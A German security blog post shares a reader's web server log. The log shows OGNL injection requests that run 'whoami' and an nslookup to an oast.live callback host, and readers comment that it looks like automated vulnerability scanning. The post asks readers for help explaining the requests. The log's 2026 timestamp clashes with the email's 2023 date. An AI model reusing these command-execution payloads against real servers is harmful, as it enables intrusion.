Merkwürdigkeit in (Web-)Server Log-Dateien

Sicherheit (Pexels, allgemeine Nutzung)Ich stelle mal einen Sachverhalt hier im Blog ein, auf den ich mir noch keinen finalen Reim machen kann. Einem Benutzer ist beim Auswerten seiner Server-Log-Dateien aufgefallen, dass es immer wieder Versuche gibt, eine bestimmte Datei von diesem Webserver herunter zu laden. Spontan tippe ich darauf, dass da irgend eine Schwachstelle ausgekundschaftet werden soll.


Anzeige

Blog-Leser Wolfgang O. hat mich zum 9. Juni 2023 per Mail bezüglich des Themas kontaktiert, ich komme aber erst jetzt dazu, das Ganze hier im Blog einzustellen. Wolfgang schrieb:

Seltsamkeit in Server-Log

Hallo Günter,

heute habe ich im Log meines Servers etwas für mich noch unbekanntes
entdeckt. Jemand hat versucht, folgende "Datei" herunterzuladen:

hddps:  //mein. webserver . de/${(#a=@org . apache.commons . io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("whoami").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

Im Log steht dazu folgender Eintrag:

GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ 
HTTP/1.1 
Host: n.n.n.n 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 
Connection: close 
Accept: */* 
Accept-Language: en 
Accept-Encoding: gzip 
08.06.2026 um 13:57:21 

Dann, eine Sekunde später und mit anderem User-Agent:


GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20ci1h73pgd9ul7vo9lsog8mbibj7cm8omc.oast.live%22%29%7D/ 
HTTP/1.1 
Host: n.n.n.n 
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/34.0.1866.237 Safari/537.36 
Connection: close 
Accept: */* 
Accept-Language: en 
Accept-Encoding: gzip 

für diese "Datei":

hddps : //mein. webserver. de/${@java.lang.Runtime@getRuntime().exec("nslookupci1h73pgd9ul7vo9lsog8mbibj7cm8omc.oast.live")}

In beiden Fällen kam der Besucher von folgender IP-Adresse:

WHOIS Source: RIPE NCC
IP Address:   45.83.123.30
Country:      Netherlands
Network Name: LXD
Owner Name:
CIDR:         45.83.122.0/23
>From IP:      45.83.122.0
To IP:        45.83.123.255
Allocated:    Yes
Contact Name: Rea Ketty
Address:      SEYCHELLES, Mahe, 1111, House of Francis, Room 303, IIe Du
Port
Email:        abuse.itweb@gmail.com
Abuse Email:  abuse.itweb@gmail.com
Phone:        +14708099233
Fax:

Eine erste schnelle Suche bei Google hat nichts ergeben. Ecosia hat die Suche geblockt ("Suspicious").

Ist das was Neues?

Falls ja, vielleicht hast Du ja jemanden, den das interessieren könnte. Ich selber kenne da niemanden. Ich habe im übrigen alle Verweise auf meinen Server anonymisiert. Er steht bei HostEurope, ein selbstgeschriebener Webserver, deshalb liefen die Versuche mit Apache und Java ins Leere. Ansonsten hätte der Besucher wohl mehr versucht. Vermutung meinerseits.

Mal schauen, ob die Mail wegen der eingebetteten Links überhaupt durch den Spamfilter kommt. Deshalb habe ich das da oben jeweils am Anfang  zerstückelt.

Danke fürs Lesen und dann noch ein schönes Wochenende

Frage an die Leserschaft: Kann sich jemand einen Reim darauf machen?


Cookies blockieren entzieht uns die Finanzierung: Cookie-Einstellungen

Dieser Beitrag wurde unter Sicherheit abgelegt und mit verschlagwortet. Setze ein Lesezeichen auf den Permalink.

8 Antworten zu Merkwürdigkeit in (Web-)Server Log-Dateien

  1. masterX244 sagt:

    Sieht nach irgendwas Log4shell-ähnlichem aus wo jemand hofft dass der String von einem Java-framework verarbeitet wird

  2. Anonymous sagt:

    Automatisierte Abarbeitung bekannter Schwachstellen egal ob das zum Server "passt" oder nich. Sieht man oft, wenn zB. auch zig WordPress exploits versucht werden, aber gar kein WordPress läuft usw.

  3. Sven Fischer sagt:

    Ich gehe da mit Bernd und masterX244 konform. Da müßte man die Sache weiter vertiefend untersuchen. Aufbau und Struktur des Systems, welche Software und in welcher Version da vorhanden ist usw.

  4. 1ST1 sagt:

    Ah, Seychellen, wie so oft. Kann man per Geoblocking komplett sperren (sofern man nicht gerade ein Reiseveranstalter ist), von da kommt nichts vernünftiges. Die haben dort sehr lasche Gesetze was ISP und Serverhosting angeht, dementsprechend werden dort viele viele kriminelle Dienste gehostet.

    • Fachkraft IT sagt:

      Angreifer sitzen in der Regel nie dort, wo Du eine Angreifer IP siehst, dort sind allenfalls paar gehackte Geräte die von anderwo wieder über gehackte Geräte usw. genutzt werden.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

Hinweis: Bitte beachtet die Regeln zum Kommentieren im Blog (Erstkommentare und Verlinktes landet in der Moderation, gebe ich alle paar Stunden frei, SEO-Posts/SPAM lösche ich rigoros). Kommentare abseits des Themas bitte unter Diskussion.